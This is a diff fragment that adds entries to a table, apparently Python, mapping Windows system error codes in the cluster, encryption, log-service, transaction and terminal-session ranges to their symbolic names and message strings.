+ 0x0000171b: ("ERROR_CLUSTER_REGISTRY_INVALID_FUNCTION", "An invalid cluster registry operation was attempted."),
+ 0x0000171c: ("ERROR_CLUSTER_INVALID_STRING_TERMINATION", "An input string of characters is not properly terminated."),
+ 0x0000171d: ("ERROR_CLUSTER_INVALID_STRING_FORMAT", "An input string of characters is not in a valid format for the data it represents."),
+ 0x0000171e: ("ERROR_CLUSTER_DATABASE_TRANSACTION_IN_PROGRESS", "An internal cluster error occurred. A cluster database transaction was attempted while a transaction was already in progress."),
+ 0x0000171f: ("ERROR_CLUSTER_DATABASE_TRANSACTION_NOT_IN_PROGRESS", "An internal cluster error occurred. There was an attempt to commit a cluster database transaction while no transaction was in progress."),
+ 0x00001720: ("ERROR_CLUSTER_NULL_DATA", "An internal cluster error occurred. Data was not properly initialized."),
+ 0x00001721: ("ERROR_CLUSTER_PARTIAL_READ", "An error occurred while reading from a stream of data. An unexpected number of bytes was returned."),
+ 0x00001722: ("ERROR_CLUSTER_PARTIAL_WRITE", "An error occurred while writing to a stream of data. The required number of bytes could not be written."),
+ 0x00001723: ("ERROR_CLUSTER_CANT_DESERIALIZE_DATA", "An error occurred while deserializing a stream of cluster data."),
+ 0x00001724: ("ERROR_DEPENDENT_RESOURCE_PROPERTY_CONFLICT", "One or more property values for this resource are in conflict with one or more property values associated with its dependent resource(s)."),
+ 0x00001725: ("ERROR_CLUSTER_NO_QUORUM", "A quorum of cluster nodes was not present to form a cluster."),
+ 0x00001726: ("ERROR_CLUSTER_INVALID_IPV6_NETWORK", "The cluster network is not valid for an IPv6 Address resource, or it does not match the configured address."),
+ 0x00001727: ("ERROR_CLUSTER_INVALID_IPV6_TUNNEL_NETWORK", "The cluster network is not valid for an IPv6 Tunnel resource. Check the configuration of the IP Address resource on which the IPv6 Tunnel resource depends."),
+ 0x00001728: ("ERROR_QUORUM_NOT_ALLOWED_IN_THIS_GROUP", "Quorum resource cannot reside in the Available Storage group."),
+ 0x00001729: ("ERROR_DEPENDENCY_TREE_TOO_COMPLEX", "The dependencies for this resource are nested too deeply."),
+ 0x0000172a: ("ERROR_EXCEPTION_IN_RESOURCE_CALL", "The call into the resource DLL raised an unhandled exception."),
+ 0x0000172b: ("ERROR_CLUSTER_RHS_FAILED_INITIALIZATION", "The RHS process failed to initialize."),
+ 0x0000172c: ("ERROR_CLUSTER_NOT_INSTALLED", "The Failover Clustering feature is not installed on this node."),
+ 0x0000172d: ("ERROR_CLUSTER_RESOURCES_MUST_BE_ONLINE_ON_THE_SAME_NODE", "The resources must be online on the same node for this operation"),
+ 0x0000172e: ("ERROR_CLUSTER_MAX_NODES_IN_CLUSTER", "A new node can not be added since this cluster is already at its maximum number of nodes."),
+ 0x0000172f: ("ERROR_CLUSTER_TOO_MANY_NODES", "This cluster can not be created since the specified number of nodes exceeds the maximum allowed limit."),
+ 0x00001730: ("ERROR_CLUSTER_OBJECT_ALREADY_USED", "An attempt to use the specified cluster name failed because an enabled computer object with the given name already exists in the domain."),
+ 0x00001731: ("ERROR_NONCORE_GROUPS_FOUND", "This cluster cannot be destroyed. It has non-core application groups which must be deleted before the cluster can be destroyed."),
+ 0x00001732: ("ERROR_FILE_SHARE_RESOURCE_CONFLICT", "File share associated with file share witness resource cannot be hosted by this cluster or any of its nodes."),
+ 0x00001733: ("ERROR_CLUSTER_EVICT_INVALID_REQUEST", "Eviction of this node is invalid at this time. Due to quorum requirements node eviction will result in cluster shutdown."),
+ 0x00001734: ("ERROR_CLUSTER_SINGLETON_RESOURCE", "Only one instance of this resource type is allowed in the cluster."),
+ 0x00001735: ("ERROR_CLUSTER_GROUP_SINGLETON_RESOURCE", "Only one instance of this resource type is allowed per resource group."),
+ 0x00001736: ("ERROR_CLUSTER_RESOURCE_PROVIDER_FAILED", "The resource failed to come online due to the failure of one or more provider resources."),
+ 0x00001737: ("ERROR_CLUSTER_RESOURCE_CONFIGURATION_ERROR", "The resource has indicated that it cannot come online on any node."),
+ 0x00001738: ("ERROR_CLUSTER_GROUP_BUSY", "The current operation cannot be performed on this group at this time."),
+ 0x00001739: ("ERROR_CLUSTER_NOT_SHARED_VOLUME", "The directory or file is not located on a cluster shared volume."),
+ 0x0000173a: ("ERROR_CLUSTER_INVALID_SECURITY_DESCRIPTOR", "The Security Descriptor does not meet the requirements for a cluster."),
+ 0x0000173b: ("ERROR_CLUSTER_SHARED_VOLUMES_IN_USE", "There is one or more shared volumes resources configured in the cluster."),
+ 0x0000173c: ("ERROR_CLUSTER_USE_SHARED_VOLUMES_API", "This group or resource cannot be directly manipulated."),
+ 0x0000173d: ("ERROR_CLUSTER_BACKUP_IN_PROGRESS", "Back up is in progress. Please wait for backup completion before trying this operation again."),
+ 0x0000173e: ("ERROR_NON_CSV_PATH", "The path does not belong to a cluster shared volume."),
+ 0x0000173f: ("ERROR_CSV_VOLUME_NOT_LOCAL", "The cluster shared volume is not locally mounted on this node."),
+ 0x00001740: ("ERROR_CLUSTER_WATCHDOG_TERMINATING", "The cluster watchdog is terminating."),
+ 0x00001741: ("ERROR_CLUSTER_RESOURCE_VETOED_MOVE_INCOMPATIBLE_NODES", "A resource vetoed a move between two nodes because they are incompatible."),
+ 0x00001742: ("ERROR_CLUSTER_INVALID_NODE_WEIGHT", "The request is invalid either because node weight cannot be changed while the cluster is in disk-only quorum mode, or because changing the node weight would violate the minimum cluster quorum requirements."),
+ 0x00001743: ("ERROR_CLUSTER_RESOURCE_VETOED_CALL", "The resource vetoed the call."),
+ 0x00001744: ("ERROR_RESMON_SYSTEM_RESOURCES_LACKING", "Resource could not start or run because it could not reserve sufficient system resources."),
+ 0x00001745: ("ERROR_CLUSTER_RESOURCE_VETOED_MOVE_NOT_ENOUGH_RESOURCES_ON_DESTINATION", "A resource vetoed a move between two nodes because the destination currently does not have enough resources to complete the operation."),
+ 0x00001746: ("ERROR_CLUSTER_RESOURCE_VETOED_MOVE_NOT_ENOUGH_RESOURCES_ON_SOURCE", ""),
+ 0x00001747: ("ERROR_CLUSTER_GROUP_QUEUED", ""),
+ 0x00001748: ("ERROR_CLUSTER_RESOURCE_LOCKED_STATUS", ""),
+ 0x00001749: ("ERROR_CLUSTER_SHARED_VOLUME_FAILOVER_NOT_ALLOWED", ""),
+ 0x0000174a: ("ERROR_CLUSTER_NODE_DRAIN_IN_PROGRESS", ""),
+ 0x0000174b: ("ERROR_CLUSTER_DISK_NOT_CONNECTED", ""),
+ 0x0000174c: ("ERROR_DISK_NOT_CSV_CAPABLE", ""),
+ 0x0000174d: ("ERROR_RESOURCE_NOT_IN_AVAILABLE_STORAGE", ""),
+ 0x0000174e: ("ERROR_CLUSTER_SHARED_VOLUME_REDIRECTED", ""),
+ 0x0000174f: ("ERROR_CLUSTER_SHARED_VOLUME_NOT_REDIRECTED", ""),
+ 0x00001750: ("ERROR_CLUSTER_CANNOT_RETURN_PROPERTIES", ""),
+ 0x00001751: ("ERROR_CLUSTER_RESOURCE_CONTAINS_UNSUPPORTED_DIFF_AREA_FOR_SHARED_VOLUMES", ""),
+ 0x00001752: ("ERROR_CLUSTER_RESOURCE_IS_IN_MAINTENANCE_MODE", ""),
+ 0x00001753: ("ERROR_CLUSTER_AFFINITY_CONFLICT", ""),
+ 0x00001754: ("ERROR_CLUSTER_RESOURCE_IS_REPLICA_VIRTUAL_MACHINE", ""),
+ 0x00001770: ("ERROR_ENCRYPTION_FAILED", "The specified file could not be encrypted."),
+ 0x00001771: ("ERROR_DECRYPTION_FAILED", "The specified file could not be decrypted."),
+ 0x00001772: ("ERROR_FILE_ENCRYPTED", "The specified file is encrypted and the user does not have the ability to decrypt it."),
+ 0x00001773: ("ERROR_NO_RECOVERY_POLICY", "There is no valid encryption recovery policy configured for this system."),
+ 0x00001774: ("ERROR_NO_EFS", "The required encryption driver is not loaded for this system."),
+ 0x00001775: ("ERROR_WRONG_EFS", "The file was encrypted with a different encryption driver than is currently loaded."),
+ 0x00001776: ("ERROR_NO_USER_KEYS", "There are no EFS keys defined for the user."),
+ 0x00001777: ("ERROR_FILE_NOT_ENCRYPTED", "The specified file is not encrypted."),
+ 0x00001778: ("ERROR_NOT_EXPORT_FORMAT", "The specified file is not in the defined EFS export format."),
+ 0x00001779: ("ERROR_FILE_READ_ONLY", "The specified file is read only."),
+ 0x0000177a: ("ERROR_DIR_EFS_DISALLOWED", "The directory has been disabled for encryption."),
+ 0x0000177b: ("ERROR_EFS_SERVER_NOT_TRUSTED", "The server is not trusted for remote encryption operation."),
+ 0x0000177c: ("ERROR_BAD_RECOVERY_POLICY", "Recovery policy configured for this system contains invalid recovery certificate."),
+ 0x0000177d: ("ERROR_EFS_ALG_BLOB_TOO_BIG", "The encryption algorithm used on the source file needs a bigger key buffer than the one on the destination file."),
+ 0x0000177e: ("ERROR_VOLUME_NOT_SUPPORT_EFS", "The disk partition does not support file encryption."),
+ 0x0000177f: ("ERROR_EFS_DISABLED", "This machine is disabled for file encryption."),
+ 0x00001780: ("ERROR_EFS_VERSION_NOT_SUPPORT", "A newer system is required to decrypt this encrypted file."),
+ 0x00001781: ("ERROR_CS_ENCRYPTION_INVALID_SERVER_RESPONSE", "The remote server sent an invalid response for a file being opened with Client Side Encryption."),
+ 0x00001782: ("ERROR_CS_ENCRYPTION_UNSUPPORTED_SERVER", "Client Side Encryption is not supported by the remote server even though it claims to support it."),
+ 0x00001783: ("ERROR_CS_ENCRYPTION_EXISTING_ENCRYPTED_FILE", "File is encrypted and should be opened in Client Side Encryption mode."),
+ 0x00001784: ("ERROR_CS_ENCRYPTION_NEW_ENCRYPTED_FILE", "A new encrypted file is being created and a $EFS needs to be provided."),
+ 0x00001785: ("ERROR_CS_ENCRYPTION_FILE_NOT_CSE", "The SMB client requested a CSE FSCTL on a non-CSE file."),
+ 0x00001786: ("ERROR_ENCRYPTION_POLICY_DENIES_OPERATION", "The requested operation was blocked by policy. For more information, contact your system administrator."),
+ 0x000017e6: ("ERROR_NO_BROWSER_SERVERS_FOUND", "The list of servers for this workgroup is not currently available"),
+ 0x00001838: ("SCHED_E_SERVICE_NOT_LOCALSYSTEM", "The Task Scheduler service must be configured to run in the System account to function properly. Individual tasks may be configured to run in other accounts."),
+ 0x000019c8: ("ERROR_LOG_SECTOR_INVALID", "Log service encountered an invalid log sector."),
+ 0x000019c9: ("ERROR_LOG_SECTOR_PARITY_INVALID", "Log service encountered a log sector with invalid block parity."),
+ 0x000019ca: ("ERROR_LOG_SECTOR_REMAPPED", "Log service encountered a remapped log sector."),
+ 0x000019cb: ("ERROR_LOG_BLOCK_INCOMPLETE", "Log service encountered a partial or incomplete log block."),
+ 0x000019cc: ("ERROR_LOG_INVALID_RANGE", "Log service encountered an attempt access data outside the active log range."),
+ 0x000019cd: ("ERROR_LOG_BLOCKS_EXHAUSTED", "Log service user marshalling buffers are exhausted."),
+ 0x000019ce: ("ERROR_LOG_READ_CONTEXT_INVALID", "Log service encountered an attempt read from a marshalling area with an invalid read context."),
+ 0x000019cf: ("ERROR_LOG_RESTART_INVALID", "Log service encountered an invalid log restart area."),
+ 0x000019d0: ("ERROR_LOG_BLOCK_VERSION", "Log service encountered an invalid log block version."),
+ 0x000019d1: ("ERROR_LOG_BLOCK_INVALID", "Log service encountered an invalid log block."),
+ 0x000019d2: ("ERROR_LOG_READ_MODE_INVALID", "Log service encountered an attempt to read the log with an invalid read mode."),
+ 0x000019d3: ("ERROR_LOG_NO_RESTART", "Log service encountered a log stream with no restart area."),
+ 0x000019d4: ("ERROR_LOG_METADATA_CORRUPT", "Log service encountered a corrupted metadata file."),
+ 0x000019d5: ("ERROR_LOG_METADATA_INVALID", "Log service encountered a metadata file that could not be created by the log file system."),
+ 0x000019d6: ("ERROR_LOG_METADATA_INCONSISTENT", "Log service encountered a metadata file with inconsistent data."),
+ 0x000019d7: ("ERROR_LOG_RESERVATION_INVALID", "Log service encountered an attempt to erroneous allocate or dispose reservation space."),
+ 0x000019d8: ("ERROR_LOG_CANT_DELETE", "Log service cannot delete log file or file system container."),
+ 0x000019d9: ("ERROR_LOG_CONTAINER_LIMIT_EXCEEDED", "Log service has reached the maximum allowable containers allocated to a log file."),
+ 0x000019da: ("ERROR_LOG_START_OF_LOG", "Log service has attempted to read or write backward past the start of the log."),
+ 0x000019db: ("ERROR_LOG_POLICY_ALREADY_INSTALLED", "Log policy could not be installed because a policy of the same type is already present."),
+ 0x000019dc: ("ERROR_LOG_POLICY_NOT_INSTALLED", "Log policy in question was not installed at the time of the request."),
+ 0x000019dd: ("ERROR_LOG_POLICY_INVALID", "The installed set of policies on the log is invalid."),
+ 0x000019de: ("ERROR_LOG_POLICY_CONFLICT", "A policy on the log in question prevented the operation from completing."),
+ 0x000019df: ("ERROR_LOG_PINNED_ARCHIVE_TAIL", "Log space cannot be reclaimed because the log is pinned by the archive tail."),
+ 0x000019e0: ("ERROR_LOG_RECORD_NONEXISTENT", "Log record is not a record in the log file."),
+ 0x000019e1: ("ERROR_LOG_RECORDS_RESERVED_INVALID", "Number of reserved log records or the adjustment of the number of reserved log records is invalid."),
+ 0x000019e2: ("ERROR_LOG_SPACE_RESERVED_INVALID", "Reserved log space or the adjustment of the log space is invalid."),
+ 0x000019e3: ("ERROR_LOG_TAIL_INVALID", "An new or existing archive tail or base of the active log is invalid."),
+ 0x000019e4: ("ERROR_LOG_FULL", "Log space is exhausted."),
+ 0x000019e5: ("ERROR_COULD_NOT_RESIZE_LOG", "The log could not be set to the requested size."),
+ 0x000019e6: ("ERROR_LOG_MULTIPLEXED", "Log is multiplexed, no direct writes to the physical log is allowed."),
+ 0x000019e7: ("ERROR_LOG_DEDICATED", "The operation failed because the log is a dedicated log."),
+ 0x000019e8: ("ERROR_LOG_ARCHIVE_NOT_IN_PROGRESS", "The operation requires an archive context."),
+ 0x000019e9: ("ERROR_LOG_ARCHIVE_IN_PROGRESS", "Log archival is in progress."),
+ 0x000019ea: ("ERROR_LOG_EPHEMERAL", "The operation requires a non-ephemeral log, but the log is ephemeral."),
+ 0x000019eb: ("ERROR_LOG_NOT_ENOUGH_CONTAINERS", "The log must have at least two containers before it can be read from or written to."),
+ 0x000019ec: ("ERROR_LOG_CLIENT_ALREADY_REGISTERED", "A log client has already registered on the stream."),
+ 0x000019ed: ("ERROR_LOG_CLIENT_NOT_REGISTERED", "A log client has not been registered on the stream."),
+ 0x000019ee: ("ERROR_LOG_FULL_HANDLER_IN_PROGRESS", "A request has already been made to handle the log full condition."),
+ 0x000019ef: ("ERROR_LOG_CONTAINER_READ_FAILED", "Log service encountered an error when attempting to read from a log container."),
+ 0x000019f0: ("ERROR_LOG_CONTAINER_WRITE_FAILED", "Log service encountered an error when attempting to write to a log container."),
+ 0x000019f1: ("ERROR_LOG_CONTAINER_OPEN_FAILED", "Log service encountered an error when attempting open a log container."),
+ 0x000019f2: ("ERROR_LOG_CONTAINER_STATE_INVALID", "Log service encountered an invalid container state when attempting a requested action."),
+ 0x000019f3: ("ERROR_LOG_STATE_INVALID", "Log service is not in the correct state to perform a requested action."),
+ 0x000019f4: ("ERROR_LOG_PINNED", "Log space cannot be reclaimed because the log is pinned."),
+ 0x000019f5: ("ERROR_LOG_METADATA_FLUSH_FAILED", "Log metadata flush failed."),
+ 0x000019f6: ("ERROR_LOG_INCONSISTENT_SECURITY", "Security on the log and its containers is inconsistent."),
+ 0x000019f7: ("ERROR_LOG_APPENDED_FLUSH_FAILED", "Records were appended to the log or reservation changes were made, but the log could not be flushed."),
+ 0x000019f8: ("ERROR_LOG_PINNED_RESERVATION", "The log is pinned due to reservation consuming most of the log space. Free some reserved records to make space available."),
+ 0x00001a2c: ("ERROR_INVALID_TRANSACTION", "The transaction handle associated with this operation is not valid."),
+ 0x00001a2d: ("ERROR_TRANSACTION_NOT_ACTIVE", "The requested operation was made in the context of a transaction that is no longer active."),
+ 0x00001a2e: ("ERROR_TRANSACTION_REQUEST_NOT_VALID", "The requested operation is not valid on the Transaction object in its current state."),
+ 0x00001a2f: ("ERROR_TRANSACTION_NOT_REQUESTED", "The caller has called a response API, but the response is not expected because the TM did not issue the corresponding request to the caller."),
+ 0x00001a30: ("ERROR_TRANSACTION_ALREADY_ABORTED", "It is too late to perform the requested operation, since the Transaction has already been aborted."),
+ 0x00001a31: ("ERROR_TRANSACTION_ALREADY_COMMITTED", "It is too late to perform the requested operation, since the Transaction has already been committed."),
+ 0x00001a32: ("ERROR_TM_INITIALIZATION_FAILED", "The Transaction Manager was unable to be successfully initialized. Transacted operations are not supported."),
+ 0x00001a33: ("ERROR_RESOURCEMANAGER_READ_ONLY", "The specified ResourceManager made no changes or updates to the resource under this transaction."),
+ 0x00001a34: ("ERROR_TRANSACTION_NOT_JOINED", "The resource manager has attempted to prepare a transaction that it has not successfully joined."),
+ 0x00001a35: ("ERROR_TRANSACTION_SUPERIOR_EXISTS", "The Transaction object already has a superior enlistment, and the caller attempted an operation that would have created a new superior. Only a single superior enlistment is allow."),
+ 0x00001a36: ("ERROR_CRM_PROTOCOL_ALREADY_EXISTS", "The RM tried to register a protocol that already exists."),
+ 0x00001a37: ("ERROR_TRANSACTION_PROPAGATION_FAILED", "The attempt to propagate the Transaction failed."),
+ 0x00001a38: ("ERROR_CRM_PROTOCOL_NOT_FOUND", "The requested propagation protocol was not registered as a CRM."),
+ 0x00001a39: ("ERROR_TRANSACTION_INVALID_MARSHALL_BUFFER", "The buffer passed in to PushTransaction or PullTransaction is not in a valid format."),
+ 0x00001a3a: ("ERROR_CURRENT_TRANSACTION_NOT_VALID", "The current transaction context associated with the thread is not a valid handle to a transaction object."),
+ 0x00001a3b: ("ERROR_TRANSACTION_NOT_FOUND", "The specified Transaction object could not be opened, because it was not found."),
+ 0x00001a3c: ("ERROR_RESOURCEMANAGER_NOT_FOUND", "The specified ResourceManager object could not be opened, because it was not found."),
+ 0x00001a3d: ("ERROR_ENLISTMENT_NOT_FOUND", "The specified Enlistment object could not be opened, because it was not found."),
+ 0x00001a3e: ("ERROR_TRANSACTIONMANAGER_NOT_FOUND", "The specified TransactionManager object could not be opened, because it was not found."),
+ 0x00001a3f: ("ERROR_TRANSACTIONMANAGER_NOT_ONLINE", "The object specified could not be created or opened, because its associated TransactionManager is not online. The TransactionManager must be brought fully Online by calling RecoverTransactionManager to recover to the end of its LogFile before objects in its Transaction or ResourceManager namespaces can be opened. In addition, errors in writing records to its LogFile can cause a TransactionManager to go offline."),
+ 0x00001a40: ("ERROR_TRANSACTIONMANAGER_RECOVERY_NAME_COLLISION", "The specified TransactionManager was unable to create the objects contained in its logfile in the Ob namespace. Therefore, the TransactionManager was unable to recover."),
+ 0x00001a41: ("ERROR_TRANSACTION_NOT_ROOT", "The call to create a superior Enlistment on this Transaction object could not be completed, because the Transaction object specified for the enlistment is a subordinate branch of the Transaction. Only the root of the Transaction can be enlisted on as a superior."),
+ 0x00001a42: ("ERROR_TRANSACTION_OBJECT_EXPIRED", "Because the associated transaction manager or resource manager has been closed, the handle is no longer valid."),
+ 0x00001a43: ("ERROR_TRANSACTION_RESPONSE_NOT_ENLISTED", "The specified operation could not be performed on this Superior enlistment, because the enlistment was not created with the corresponding completion response in the NotificationMask."),
+ 0x00001a44: ("ERROR_TRANSACTION_RECORD_TOO_LONG", "The specified operation could not be performed, because the record that would be logged was too long. This can occur because of two conditions: either there are too many Enlistments on this Transaction, or the combined RecoveryInformation being logged on behalf of those Enlistments is too long."),
+ 0x00001a45: ("ERROR_IMPLICIT_TRANSACTION_NOT_SUPPORTED", "Implicit transaction are not supported."),
+ 0x00001a46: ("ERROR_TRANSACTION_INTEGRITY_VIOLATED", "The kernel transaction manager had to abort or forget the transaction because it blocked forward progress."),
+ 0x00001a47: ("ERROR_TRANSACTIONMANAGER_IDENTITY_MISMATCH", "The TransactionManager identity that was supplied did not match the one recorded in the TransactionManager's log file."),
+ 0x00001a48: ("ERROR_RM_CANNOT_BE_FROZEN_FOR_SNAPSHOT", "This snapshot operation cannot continue because a transactional resource manager cannot be frozen in its current state. Please try again."),
+ 0x00001a49: ("ERROR_TRANSACTION_MUST_WRITETHROUGH", "The transaction cannot be enlisted on with the specified EnlistmentMask, because the transaction has already completed the PrePrepare phase. In order to ensure correctness, the ResourceManager must switch to a write-through mode and cease caching data within this transaction. Enlisting for only subsequent transaction phases may still succeed."),
+ 0x00001a4a: ("ERROR_TRANSACTION_NO_SUPERIOR", "The transaction does not have a superior enlistment."),
+ 0x00001a4b: ("ERROR_HEURISTIC_DAMAGE_POSSIBLE", "The attempt to commit the Transaction completed, but it is possible that some portion of the transaction tree did not commit successfully due to heuristics. Therefore it is possible that some data modified in the transaction may not have committed, resulting in transactional inconsistency. If possible, check the consistency of the associated data."),
+ 0x00001a90: ("ERROR_TRANSACTIONAL_CONFLICT", "The function attempted to use a name that is reserved for use by another transaction."),
+ 0x00001a91: ("ERROR_RM_NOT_ACTIVE", "Transaction support within the specified resource manager is not started or was shut down due to an error."),
+ 0x00001a92: ("ERROR_RM_METADATA_CORRUPT", "The metadata of the RM has been corrupted. The RM will not function."),
+ 0x00001a93: ("ERROR_DIRECTORY_NOT_RM", "The specified directory does not contain a resource manager."),
+ 0x00001a95: ("ERROR_TRANSACTIONS_UNSUPPORTED_REMOTE", "The remote server or share does not support transacted file operations."),
+ 0x00001a96: ("ERROR_LOG_RESIZE_INVALID_SIZE", "The requested log size is invalid."),
+ 0x00001a97: ("ERROR_OBJECT_NO_LONGER_EXISTS", "The object (file, stream, link) corresponding to the handle has been deleted by a Transaction Savepoint Rollback."),
+ 0x00001a98: ("ERROR_STREAM_MINIVERSION_NOT_FOUND", "The specified file miniversion was not found for this transacted file open."),
+ 0x00001a99: ("ERROR_STREAM_MINIVERSION_NOT_VALID", "The specified file miniversion was found but has been invalidated. Most likely cause is a transaction savepoint rollback."),
+ 0x00001a9a: ("ERROR_MINIVERSION_INACCESSIBLE_FROM_SPECIFIED_TRANSACTION", "A miniversion may only be opened in the context of the transaction that created it."),
+ 0x00001a9b: ("ERROR_CANT_OPEN_MINIVERSION_WITH_MODIFY_INTENT", "It is not possible to open a miniversion with modify access."),
+ 0x00001a9c: ("ERROR_CANT_CREATE_MORE_STREAM_MINIVERSIONS", "It is not possible to create any more miniversions for this stream."),
+ 0x00001a9e: ("ERROR_REMOTE_FILE_VERSION_MISMATCH", "The remote server sent mismatching version number or Fid for a file opened with transactions."),
+ 0x00001a9f: ("ERROR_HANDLE_NO_LONGER_VALID", "The handle has been invalidated by a transaction. The most likely cause is the presence of memory mapping on a file or an open handle when the transaction ended or rolled back to savepoint."),
+ 0x00001aa0: ("ERROR_NO_TXF_METADATA", "There is no transaction metadata on the file."),
+ 0x00001aa1: ("ERROR_LOG_CORRUPTION_DETECTED", "The log data is corrupt."),
+ 0x00001aa2: ("ERROR_CANT_RECOVER_WITH_HANDLE_OPEN", "The file can't be recovered because there is a handle still open on it."),
+ 0x00001aa3: ("ERROR_RM_DISCONNECTED", "The transaction outcome is unavailable because the resource manager responsible for it has disconnected."),
+ 0x00001aa4: ("ERROR_ENLISTMENT_NOT_SUPERIOR", "The request was rejected because the enlistment in question is not a superior enlistment."),
+ 0x00001aa5: ("ERROR_RECOVERY_NOT_NEEDED", "The transactional resource manager is already consistent. Recovery is not needed."),
+ 0x00001aa6: ("ERROR_RM_ALREADY_STARTED", "The transactional resource manager has already been started."),
+ 0x00001aa7: ("ERROR_FILE_IDENTITY_NOT_PERSISTENT", "The file cannot be opened transactionally, because its identity depends on the outcome of an unresolved transaction."),
+ 0x00001aa8: ("ERROR_CANT_BREAK_TRANSACTIONAL_DEPENDENCY", "The operation cannot be performed because another transaction is depending on the fact that this property will not change."),
+ 0x00001aa9: ("ERROR_CANT_CROSS_RM_BOUNDARY", "The operation would involve a single file with two transactional resource managers and is therefore not allowed."),
+ 0x00001aaa: ("ERROR_TXF_DIR_NOT_EMPTY", "The $Txf directory must be empty for this operation to succeed."),
+ 0x00001aab: ("ERROR_INDOUBT_TRANSACTIONS_EXIST", "The operation would leave a transactional resource manager in an inconsistent state and is therefore not allowed."),
+ 0x00001aac: ("ERROR_TM_VOLATILE", "The operation could not be completed because the transaction manager does not have a log."),
+ 0x00001aad: ("ERROR_ROLLBACK_TIMER_EXPIRED", "A rollback could not be scheduled because a previously scheduled rollback has already executed or been queued for execution."),
+ 0x00001aae: ("ERROR_TXF_ATTRIBUTE_CORRUPT", "The transactional metadata attribute on the file or directory is corrupt and unreadable."),
+ 0x00001aaf: ("ERROR_EFS_NOT_ALLOWED_IN_TRANSACTION", "The encryption operation could not be completed because a transaction is active."),
+ 0x00001ab0: ("ERROR_TRANSACTIONAL_OPEN_NOT_ALLOWED", "This object is not allowed to be opened in a transaction."),
+ 0x00001ab1: ("ERROR_LOG_GROWTH_FAILED", "An attempt to create space in the transactional resource manager's log failed. The failure status has been recorded in the event log."),
+ 0x00001ab2: ("ERROR_TRANSACTED_MAPPING_UNSUPPORTED_REMOTE", "Memory mapping (creating a mapped section) a remote file under a transaction is not supported."),
+ 0x00001ab3: ("ERROR_TXF_METADATA_ALREADY_PRESENT", "Transaction metadata is already present on this file and cannot be superseded."),
+ 0x00001ab4: ("ERROR_TRANSACTION_SCOPE_CALLBACKS_NOT_SET", "A transaction scope could not be entered because the scope handler has not been initialized."),
+ 0x00001ab5: ("ERROR_TRANSACTION_REQUIRED_PROMOTION", "Promotion was required in order to allow the resource manager to enlist, but the transaction was set to disallow it."),
+ 0x00001ab6: ("ERROR_CANNOT_EXECUTE_FILE_IN_TRANSACTION", "This file is open for modification in an unresolved transaction and may be opened for execute only by a transacted reader."),
+ 0x00001ab7: ("ERROR_TRANSACTIONS_NOT_FROZEN", "The request to thaw frozen transactions was ignored because transactions had not previously been frozen."),
+ 0x00001ab8: ("ERROR_TRANSACTION_FREEZE_IN_PROGRESS", "Transactions cannot be frozen because a freeze is already in progress."),
+ 0x00001ab9: ("ERROR_NOT_SNAPSHOT_VOLUME", "The target volume is not a snapshot volume. This operation is only valid on a volume mounted as a snapshot."),
+ 0x00001aba: ("ERROR_NO_SAVEPOINT_WITH_OPEN_FILES", "The savepoint operation failed because files are open on the transaction. This is not permitted."),
+ 0x00001abb: ("ERROR_DATA_LOST_REPAIR", "Windows has discovered corruption in a file, and that file has since been repaired. Data loss may have occurred."),
+ 0x00001abc: ("ERROR_SPARSE_NOT_ALLOWED_IN_TRANSACTION", "The sparse operation could not be completed because a transaction is active on the file."),
+ 0x00001abd: ("ERROR_TM_IDENTITY_MISMATCH", "The call to create a TransactionManager object failed because the Tm Identity stored in the logfile does not match the Tm Identity that was passed in as an argument."),
+ 0x00001abe: ("ERROR_FLOATED_SECTION", "I/O was attempted on a section object that has been floated as a result of a transaction ending. There is no valid data."),
+ 0x00001abf: ("ERROR_CANNOT_ACCEPT_TRANSACTED_WORK", "The transactional resource manager cannot currently accept transacted work due to a transient condition such as low resources."),
+ 0x00001ac0: ("ERROR_CANNOT_ABORT_TRANSACTIONS", "The transactional resource manager had too many transactions outstanding that could not be aborted. The transactional resource manager has been shut down."),
+ 0x00001ac1: ("ERROR_BAD_CLUSTERS", "The operation could not be completed due to bad clusters on disk."),
+ 0x00001ac2: ("ERROR_COMPRESSION_NOT_ALLOWED_IN_TRANSACTION", "The compression operation could not be completed because a transaction is active on the file."),
+ 0x00001ac3: ("ERROR_VOLUME_DIRTY", "The operation could not be completed because the volume is dirty. Please run chkdsk and try again."),
+ 0x00001ac4: ("ERROR_NO_LINK_TRACKING_IN_TRANSACTION", "The link tracking operation could not be completed because a transaction is active."),
+ 0x00001ac5: ("ERROR_OPERATION_NOT_SUPPORTED_IN_TRANSACTION", "This operation cannot be performed in a transaction."),
+ 0x00001ac6: ("ERROR_EXPIRED_HANDLE", "The handle is no longer properly associated with its transaction. It may have been opened in a transactional resource manager that was subsequently forced to restart. Please close the handle and open a new one."),
+ 0x00001ac7: ("ERROR_TRANSACTION_NOT_ENLISTED", "The specified operation could not be performed because the resource manager is not enlisted in the transaction."),
+ 0x00001b59: ("ERROR_CTX_WINSTATION_NAME_INVALID", "The specified session name is invalid."),
+ 0x00001b5a: ("ERROR_CTX_INVALID_PD", "The specified protocol driver is invalid."),
+ 0x00001b5b: ("ERROR_CTX_PD_NOT_FOUND", "The specified protocol driver was not found in the system path."),
+ 0x00001b5c: ("ERROR_CTX_WD_NOT_FOUND", "The specified terminal connection driver was not found in the system path."),
+ 0x00001b5d: ("ERROR_CTX_CANNOT_MAKE_EVENTLOG_ENTRY", "A registry key for event logging could not be created for this session."),
+ 0x00001b5e: ("ERROR_CTX_SERVICE_NAME_COLLISION", "A service with the same name already exists on the system."),
+ 0x00001b5f: ("ERROR_CTX_CLOSE_PENDING", "A close operation is pending on the session."),
+ 0x00001b60: ("ERROR_CTX_NO_OUTBUF", "There are no free output buffers available."),
+ 0x00001b61: ("ERROR_CTX_MODEM_INF_NOT_FOUND", "The MODEM.INF file was not found."),
+ 0x00001b62: ("ERROR_CTX_INVALID_MODEMNAME", "The modem name was not found in MODEM.INF."),
+ 0x00001b63: ("ERROR_CTX_MODEM_RESPONSE_ERROR", "The modem did not accept the command sent to it. Verify that the configured modem name matches the attached modem."),
+ 0x00001b64: ("ERROR_CTX_MODEM_RESPONSE_TIMEOUT", "The modem did not respond to the command sent to it. Verify that the modem is properly cabled and powered on."),
+ 0x00001b65: ("ERROR_CTX_MODEM_RESPONSE_NO_CARRIER", "Carrier detect has failed or carrier has been dropped due to disconnect."),
+ 0x00001b66: ("ERROR_CTX_MODEM_RESPONSE_NO_DIALTONE", "Dial tone not detected within the required time. Verify that the phone cable is properly attached and functional."),
+ 0x00001b67: ("ERROR_CTX_MODEM_RESPONSE_BUSY", "Busy signal detected at remote site on callback."),
